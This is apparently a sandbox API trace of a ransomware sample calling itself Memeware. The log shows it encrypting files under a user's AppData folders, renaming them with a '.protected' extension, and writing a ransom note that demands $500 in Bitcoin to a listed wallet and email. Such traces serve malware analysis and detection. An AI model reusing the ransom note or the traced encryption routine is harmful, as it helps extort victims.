(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.726] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.726] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.726] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.726] CloseHandle (hObject=0x150) returned 1 [0086.726] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Windows") returned -1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Program Files") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Program Files (x86)") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="$Recycle.bin") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="System Volume Information") returned 1 [0086.726] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.726] StrStrIW (lpFirst="updates.xml", lpSrch=".protected") returned 0x0 [0086.726] lstrcmpW (lpString1="updates.xml", lpString2="RESTORE_FILES.txt") returned 1 [0086.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".txt") returned 0x0 [0086.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".rar") returned 0x0 [0086.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".zip") returned 0x0 [0086.727] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x39, lpOverlapped=0x0) returned 1 [0086.729] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.729] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x39, lpOverlapped=0x0) returned 1 [0086.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.730] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.730] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.730] CloseHandle (hObject=0x150) returned 1 [0086.731] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.protected") returned 102 [0086.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.protected")) returned 1 [0086.731] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.732] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.732] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\RESTORE_FILES.txt") returned 98 [0086.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.732] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.733] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.733] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.733] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.733] CloseHandle (hObject=0x14c) returned 1 [0086.734] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.734] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\RESTORE_FILES.txt") returned 81 [0086.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.735] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.735] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.736] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.736] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.736] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.736] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.736] CloseHandle (hObject=0xd8) returned 1 [0086.736] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.736] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.737] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\RESTORE_FILES.txt") returned 73 [0086.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.737] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.738] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.738] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.738] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.738] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0086.738] CloseHandle (hObject=0xd4) returned 1 [0086.739] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0086.739] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 52 [0086.739] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0086.739] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*") returned 54 [0086.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.740] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.740] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\.") returned 54 [0086.740] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.740] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.740] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.740] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\..") returned 55 [0086.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.740] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Windows") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Program Files") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Program Files (x86)") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="$Recycle.bin") returned 1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="System Volume Information") returned -1 [0086.741] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrIW (lpFirst="0r6e.m4a", lpSrch=".protected") returned 0x0 [0086.741] lstrcmpW (lpString1="0r6e.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0086.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".txt") returned 0x0 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".rar") returned 0x0 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".zip") returned 0x0 [0086.742] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.742] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.742] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.743] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.743] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.743] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.743] CloseHandle (hObject=0xd8) returned 1 [0086.743] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a.protected") returned 71 [0086.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a.protected")) returned 1 [0086.745] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="Windows") returned -1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="Program Files") returned -1 [0086.745] lstrcmpiW 